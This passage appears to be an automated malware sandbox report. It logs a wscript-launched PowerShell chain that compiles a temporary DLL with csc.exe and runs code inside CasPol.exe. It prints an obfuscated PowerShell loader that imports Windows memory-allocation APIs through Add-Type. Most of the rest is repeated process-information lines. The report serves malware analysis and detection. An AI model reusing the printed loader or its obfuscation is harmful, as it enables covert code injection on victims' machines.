NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_200F1288 push ss; iretd		17_2_200F1289
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_201058B0 push 0000001Fh; ret		17_2_20105960

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
